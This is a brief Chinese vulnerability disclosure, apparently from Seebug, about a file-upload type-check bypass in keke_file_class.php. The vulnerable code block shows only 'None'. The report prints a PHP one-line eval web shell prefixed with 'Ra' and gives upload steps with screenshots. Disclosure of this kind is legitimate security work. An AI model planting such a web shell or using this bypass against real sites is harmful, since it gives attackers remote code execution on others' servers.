### 简要描述:
文件类型过滤不严,可以绕过上传
### 详细说明:
漏洞代码:
/lib/helper/keke_file_class.php 138~158行
```
None
```
2.shell前面加上Ra
Ra<?php eval($_POST[cmd]) ?>
[<img src="https://images.seebug.org/upload/201401/2922005378561da7ff3cb7042a0e1e20d7d93d83.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/2922005378561da7ff3cb7042a0e1e20d7d93d83.jpg)
3.上传shell
[<img src="https://images.seebug.org/upload/201401/29220114f5322df3c21ece71d4caebd5570b77cf.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/29220114f5322df3c21ece71d4caebd5570b77cf.jpg)
[<img src="https://images.seebug.org/upload/201401/292201316e3ae7c3081f8b6ba7d9d5144ed79900.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/292201316e3ae7c3081f8b6ba7d9d5144ed79900.jpg)
京公网安备 11010502034610号
暂无评论